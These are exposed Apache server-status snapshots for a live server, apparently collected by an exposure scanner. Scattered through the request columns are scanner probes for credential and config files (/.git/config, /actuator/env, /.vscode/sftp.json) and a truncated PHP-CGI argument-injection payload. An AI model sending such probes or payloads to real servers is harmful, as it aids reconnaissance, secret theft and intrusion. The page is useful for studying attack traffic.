0.65141223286550.00.001524.99 172.71.146.131h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-41514294660/2/45367_ 0.68122218320570.00.041412.41 172.71.147.134h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-41514294660/2/45136_ 0.65151328418100.00.011638.24 172.71.146.154h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41514294670/2/50205_ 0.6561226136190.00.061653.94 172.71.146.29h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41514294670/3/50715_ 0.6570268140360.00.021643.49 172.71.147.156h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41514294670/2/50341_ 0.6380280311070.00.021554.36 172.71.147.52h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41514294670/1/50260_ 0.6268719621390.00.011528.77 108.162.245.146h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41514294670/0/50783_ 0.0080244409840.00.001593.04 54.233.182.166http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41514294670/2/51477_ 0.6380244503850.00.001558.04 172.71.146.201h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41514294670/1/50586_ 0.6560277220140.00.011520.47 172.71.146.133h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41514294670/3/51230_ 0.6580226944920.00.021532.63 172.71.147.143h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41514294670/2/49383_ 0.6581354869190.021.461391.06 172.71.146.128h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41514294670/1/50852_ 0.6470479474730.00.001482.92 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41514294680/1/47578_ 0.07140255364010.00.001423.62 134.209.25.199http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 2-41514294680/1/46800_ 0.57111396779530.00.031354.95 172.71.147.237h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41514294680/2/47491_ 0.57110305587920.00.031485.76 172.71.147.151h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41514294680/1/46524_ 0.56153234581330.00.021396.90 172.71.146.101h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41514294680/1/46859_ 0.5660210665210.00.021563.90 172.71.147.57h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41514294680/0/47338_ 0.006522243547440.00.001377.96 172.71.194.25h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41514294680/1/46903_ 0.56144221834070.00.001430.36 162.159.120.210h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41514294680/2/47158_ 0.56151251276880.00.001429.67 172.71.146.253h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41514294680/1/47129_ 0.56140245782130.00.001608.73 108.162.245.227h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41514294680/1/47586_ 0.5664265105920.00.001460.33 108.162.245.105h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-41514294650/12/55185_ 1.1093333355290.00.371702.47 108.162.246.174h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-41514294650/12/53783_ 1.148250299946450.00.031506.23 172.71.146.120h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-41514294650/13/55079_ 1.1220334625200.00.071680.70 172.71.146.212h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-41514294650/15/54175_ 1.1940355682790.00.641797.67 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-41514294650/12/54591_ 1.1770284053540.00.411562.59 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-41514294650/13/54523_ 1.1740268476050.00.071696.29 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 3-41514294650/17/55002_ 1.1770304276660.00.341727.95 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 3-41514294650/15/54784_ 1.1670388454800.00.251721.10 172.71.146.78h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-41514294650/13/53909_ 1.1670923524430.00.201640.52 172.71.146.193h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-41514294650/12/55206_ 1.1670408756820.00.551624.57 172.71.146.72h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-41514295980/16/47336_ 1.2250410398750.00.321557.72 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-41514295980/16/47546W 1.1700283771560.00.601559.79 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-41514295980/12/47588_ 1.1620242145870.00.131582.48 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-41514295980/20/47743_ 1.2210260667410.00.071500.47 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 4-41514295980/15/46969_ 1.2230273681950.00.451429.35 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc8f88ecd9b
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 26-Nov-2025 04:53:16 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 394 Parent Server MPM Generation: 393 Server uptime: 74 days 16 hours 32 minutes 14 seconds Server load: 0.12 0.14 0.11 Total accesses: 2351696 - Total Traffic: 72.2 GB - Total Duration: 1469112657 CPU Usage: u225.9 s259.43 cu12923.8 cs7408.04 - .323% CPU load .364 requests/sec - 11.7 kB/second - 32.2 kB/request - 624.703 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0901857no0yes19000 1901856no2yes010100 2901892no0yes010000 3901990no0yes010000 4901858no0yes010000 Sum502 149100 _______W__________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3939018570/31/43351_ 13.0200324564800.01.361591.65 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 0-3939018570/21/42899_ 13.0210482590190.01.191383.15 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 0-3939018570/33/43409_ 13.0300195823550.00.641405.54 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-3939018570/31/43019_ 13.0310207816870.00.761426.11 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 0-3939018570/32/43793_ 12.930336201922090.00.641458.44 172.71.148.57h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3939018570/38/43294_ 13.0300202394400.00.711441.26 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-3939018570/26/43538_ 13.0300282410460.00.501378.37 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 0-3939018570/27/42832W 13.0300212523800.01.261457.79 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-3939018570/25/43447_ 12.8610207739420.00.291371.71 162.159.106.81h2tandemsl.com:443done, streams: 0/1/1/0/1 (open/recv/resp/push/rst) 0-3939018570/27/43278_ 12.981380316302790.00.271556.19 172.71.141.46h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3939018560/29/48513_ 12.6610215273940.00.851586.36 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 1-3939018560/30/49099_ 12.6510254474080.01.181574.22 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 1-3939018560/33/48768_ 12.6510261742460.00.891503.06 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/gql HTTP/1.1 1-3939018560/29/48659_ 12.6510709920440.01.181477.61 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 1-3939018560/39/49263_ 12.6600231787280.01.141555.75 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-3939018560/35/49831_ 12.6500228804550.022.361497.74 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 1-3939018560/29/48955_ 12.6510263407060.00.801461.52 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 1-3939018560/37/49545_ 12.6600215631920.02.021486.63 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 1-3939018560/29/47786_ 12.6600341156320.01.071337.62 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-3939018560/39/49207_ 12.6600466898320.01.251445.07 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-3939018920/229/45978_ 24.786661244212650.03.821381.75 172.70.206.62h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3939018920/247/44966_ 24.776671379588020.07.141319.14 104.23.251.109h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3939018920/259/45753_ 24.786671294219600.05.181405.42 172.70.210.72h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3939018920/216/44876_ 24.756660221504540.04.291336.99 172.70.207.66h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3939018920/251/45158_ 24.786661197884580.03.641522.26 162.158.187.194h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3939018920/247/45662_ 24.766670214304610.03.611336.09 172.70.215.33h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3939018920/253/45132_ 24.776682211107310.05.131372.21 172.70.206.93h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3939018920/238/45486_ 24.756670239688390.04.731376.67 172.70.215.124h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3939018920/241/45431_ 24.796660231407980.05.171545.65 162.158.186.184h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3939018920/246/45848_ 24.756660253444830.05.511418.49 172.64.217.62h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3939019900/540/52987_ 39.726490317041690.08.511642.72 104.23.251.66h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3939019900/546/51458_ 39.726661282354200.010.051445.25 172.70.215.74h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3939019900/519/52770_ 39.726671311015110.010.071630.31 104.23.251.108h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3939019900/630/51891_ 39.576441333320610.09.831735.66 162.158.102.171h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3939019900/525/52144_ 39.716660259317940.031.291500.82 104.23.251.47h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3939019900/557/52119_ 39.586670245013220.011.831621.38 162.158.103.219h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3939019900/556/52596_ 39.566440290406950.08.971668.67 172.64.198.74h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3939019900/560/52574_ 39.726671370886470.010.071658.64 172.70.214.36h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3939019900/520/51677_ 39.716672909726110.010.571594.39 172.64.217.24h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3939019900/588/52880_ 39.746490387474740.010.111573.08 162.158.90.225h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3939018580/221/45116_ 20.026660377498130.03.801419.50 172.70.206.124h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3939018580/236/45324_ 20.046670266549800.03.681489.00 104.23.251.148h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3939018580/220/45353_ 20.036670227093660.03.621537.56 172.70.210.60h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3939018580/237/45582_ 20.026676242650160.04.371435.81 104.23.251.26h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3939018580/244/44802_ 20.016660254080770.03.181367.15
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc852edac94
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Monday, 24-Nov-2025 15:11:44 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 390 Parent Server MPM Generation: 389 Server uptime: 73 days 2 hours 50 minutes 41 seconds Server load: 0.70 0.73 0.67 Total accesses: 2292967 - Total Traffic: 70.5 GB - Total Duration: 1439439242 CPU Usage: u168.93 s221.09 cu12645.4 cs7266.99 - .321% CPU load .363 requests/sec - 11.7 kB/second - 32.2 kB/request - 627.763 ms/request 9 requests currently being processed, 41 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0784555no0yes19000 1784554no5yes37001 2784590no1yes19000 3784687no1yes28000 4784574no1yes28000 Sum508 941001 __W________W__R____R____R__________W__W_W_____R___ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3897845550/15/42692_ 1.6600322743550.00.141580.53 172.71.141.204h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3897845550/13/42267_ 1.67430480345880.00.141359.86 162.158.217.3h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3897845550/12/42751W 1.6600193908640.00.101393.49 162.10.161.82http/1.1cinre-backend.tandemhse.com:443GET /items/gmao_equipos?fields=id&filter=%7B%22es_archivado%22% 0-3897845550/13/42347_ 1.66421205888620.00.251397.20 162.158.217.115h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3897845550/10/43130_ 1.67430200037810.00.141446.10 162.158.217.60h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3897845550/12/42637_ 1.67430200372860.00.091430.24 162.158.217.97h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-3897845550/17/42899_ 1.66430280302150.00.231353.29 172.71.141.117h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3897845550/11/42178_ 1.67420210660190.00.211415.87 172.71.141.76h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3897845550/12/42834_ 1.65430205739370.00.181361.07 162.158.217.97h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-3897845550/14/42639_ 1.7000314375030.00.341522.88 207.154.197.113http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-3897845540/27/46608_ 2.2101206123400.00.961517.33 162.10.161.82http/1.1cinre-backend.tandemhse.com:443OPTIONS /items/gmao_equipos?fields=id&filter=%7B%22es_archivado 1-3897845540/22/47219W 2.2100244462100.00.861522.89 162.10.161.82http/1.1cinre-backend.tandemhse.com:443GET /items/gmao_equipos?fields=id&filter=%7B%22es_archivado%22% 1-3897845540/20/46816_ 2.2001251521160.00.361465.85 162.10.161.82http/1.1cinre-backend.tandemhse.com:443OPTIONS /items/gmao_equipos?fields=id&filter=%7B%22es_archivado 1-3897845540/30/46729_ 2.2101699221830.00.681432.89 162.10.161.82http/1.1 1-3897845540/15/47395R 2.0023483222336660.00.721513.71 162.158.88.115http/1.1tandemsl.com:443 1-3897845540/20/47956_ 2.2100218729940.00.221427.46 162.10.161.82http/1.1cinre-backend.tandemhse.com:443OPTIONS /items/gmao_equipos?fields=id&filter=%7B%22es_archivado 1-3897845540/25/47112_ 2.2000254711710.00.341425.31 162.10.161.82http/1.1 1-3897845540/20/47599_ 2.1700205167550.00.471443.73 207.154.197.113http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3897845540/23/45973_ 2.2100332565860.00.371299.34 162.10.161.82http/1.1cinre-backend.tandemhse.com:443OPTIONS /items/gmao_equipos?fields=id&filter=%7B%22es_archivado 1-3897845540/21/47287R 1.9725543458139900.01.671384.76 172.70.147.143http/1.1tandemsl.com:443 2-3897845900/231/45501_ 10.45430241908140.05.551372.59 172.71.141.222h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3897845900/210/44437_ 10.45420376799680.011.541291.52 162.158.217.21h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-3897845900/267/45248_ 10.45420291935740.04.121394.32 162.158.217.110h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3897845900/264/44390_ 10.46430219029590.015.751326.45 172.71.141.98h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3897845900/253/44661R 10.4400195607020.05.341513.93 162.158.123.30h2tandemsl.com:443POST /autodiscover/autodiscover.xml HTTP/2.0 2-3897845900/247/45138_ 10.46420212007000.03.981326.47 172.71.141.80h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3897845900/240/44620_ 10.45160208800870.03.511361.76 172.71.141.3h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3897845900/255/45002_ 10.4822454237709840.05.101366.64 172.69.22.169h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3897845900/233/44934_ 10.46160229331480.04.681534.65 162.158.217.59h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3897845900/272/45355_ 10.46420251295950.03.491409.25 172.71.141.71h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-3897846870/130/51015_ 6.4701307350790.01.991570.50 162.10.161.82http/1.1cinre-backend.tandemhse.com:443OPTIONS /items/gmao_equipos_modulos?fields=*&filter=%7B%22_or%2 3-3897846870/109/49364_ 6.470131272559930.02.021379.23 162.10.161.82http/1.1cinre-backend.tandemhse.com:443GET /items/gmao_equipos_modulos?fields=*&filter=%7B%22_or%22%3A 3-3897846870/131/50793_ 6.4701292633860.02.431577.90 162.10.161.82http/1.1cinre-backend.tandemhse.com:443OPTIONS /items/gmao_equipos?fields=id&filter=%7B%22es_archivado 3-3897846870/104/49828_ 6.4700321588430.02.281677.08 162.10.161.82http/1.1cinre-backend.tandemhse.com:443OPTIONS /notifications?filter=%7B%22recipient%22%3A%7B%22_eq%22 3-3897846870/185/50081_ 6.4701246957830.04.361432.51 162.10.161.82http/1.1cinre-backend.tandemhse.com:443OPTIONS /items/gmao_equipos?fields=id&filter=%7B%22es_archivado 3-3897846870/130/49992W 6.4600234866730.015.751559.15 162.10.161.82http/1.1cinre-backend.tandemhse.com:443GET /items/gmao_equipos?fields=id&filter=%7B%22es_archivado%22% 3-3897846870/102/50521_ 6.47056280165780.01.421605.67 162.10.161.82http/1.1cinre-backend.tandemhse.com:443GET /notifications?filter=%7B%22recipient%22%3A%7B%22_eq%22%3A% 3-3897846870/103/50520_ 6.4701357132500.022.941590.36 162.10.161.82http/1.1cinre-backend.tandemhse.com:443OPTIONS /items/gmao_equipos?fields=id&filter=%7B%22es_archivado 3-3897846870/129/49644W 6.4200894306770.03.861505.69 162.10.161.82http/1.1cinre-backend.tandemhse.com:443GET /items/gmao_equipos?fields=id&filter=%7B%22es_archivado%22% 3-3897846870/163/50723_ 6.4500375827070.02.601523.01 162.10.161.82http/1.1 4-3897845740/21/44409W 2.1200374664360.00.901384.48 207.154.197.113http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-3897845740/24/44498_ 2.152492263257140.00.201456.16 172.71.1.173h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3897845740/21/44618_ 2.1200224192960.00.111524.22 162.10.161.82http/1.1 4-3897845740/26/44852_ 2.1820239244860.00.381367.74 207.154.197.113http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc82a84a4f6
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 22-Nov-2025 13:13:15 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 381 Parent Server MPM Generation: 380 Server uptime: 71 days 52 minutes 12 seconds Server load: 0.21 0.11 0.04 Total accesses: 2232644 - Total Traffic: 69.2 GB - Total Duration: 1398637518 CPU Usage: u154.84 s213.24 cu12354.3 cs7071.73 - .323% CPU load .364 requests/sec - 11.8 kB/second - 32.5 kB/request - 626.449 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0551805no0yes010000 1551804no0yes010000 2551914no0yes010000 3551947no1yes19000 4551806no0yes010000 Sum501 149000 ______________________________W___________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3805518050/5/42058_ 1.554960317842600.00.471569.78 162.158.120.241h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3805518050/2/41429_ 0.854970471601070.00.001346.71 172.70.216.34h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3805518050/3/41840_ 0.844970185050130.00.011380.18 162.158.129.173h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3805518050/6/41584_ 1.58438188200787960.00.211385.08 162.158.122.176h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3805518050/5/42153_ 0.884330189031130.00.051431.36 172.70.216.9h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3805518050/3/41954_ 0.825011195302620.00.011417.78 172.69.9.128h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3805518050/6/42131_ 1.504970270017890.00.461337.89 172.68.135.12h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3805518050/3/41523_ 0.87497695179445100.00.061404.54 172.69.68.184h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3805518050/5/42062_ 0.884960193531550.00.081320.86 172.69.68.92h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3805518050/5/41886_ 1.564330305417150.00.101509.54 162.158.22.144h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3805518040/2/46325_ 0.824940205266760.00.001511.68 172.69.68.22h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3805518040/7/46939_ 1.593110243560000.00.021516.60 172.70.108.232h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3805518040/1/46533_ 0.814910250659020.00.001460.98 172.70.216.66h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-3805518040/3/46364_ 1.253110697616120.00.021426.99 172.70.216.93h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3805518040/7/47130_ 1.67316356221503780.00.621507.05 172.71.95.34h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3805518040/4/47621_ 1.60496208217499930.00.021422.73 162.158.122.175h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3805518040/2/46847_ 1.6049634253998960.00.001421.75 162.158.122.175h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-3805518040/2/47280_ 1.524941204203500.00.241435.75 172.68.135.35h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3805518040/5/45682_ 1.244910331694240.00.181295.26 172.69.9.154h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3805518040/3/47017_ 1.444970457372020.00.171377.25 162.158.122.166h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3805519140/64/43946_ 3.2010226336030.04.881347.36 64.227.32.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 2-3805519140/50/42973_ 3.161570369738430.04.431257.12 162.159.106.4h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3805519140/54/43645_ 2.97017281633810.04.611370.53 172.68.135.65h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3805519140/62/42947_ 3.2000212817490.06.091292.94 64.227.32.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 2-3805519140/58/43105_ 2.981373180904830.04.831479.34 172.71.1.173h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3805519140/55/43568_ 3.1910203131070.05.591277.29 64.227.32.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/index.html HTTP/1.1 2-3805519140/61/43108_ 3.2010200796220.04.591325.03 64.227.32.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 2-3805519140/56/43370_ 3.2000219111630.04.561325.75 64.227.32.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-3805519140/55/43435_ 3.2000220836240.04.721504.04 64.227.32.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-3805519140/44/43575_ 3.131378241218580.05.551383.46 162.158.170.89h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3805519470/62/48400W 3.3600293743860.00.411530.28 64.227.32.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-3805519470/63/46938_ 3.3900260061650.00.471337.13 64.227.32.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 3-3805519470/57/48150_ 3.3900280387930.00.241515.85 64.227.32.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 3-3805519470/94/47353_ 3.3900308249240.021.921625.24 64.227.32.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 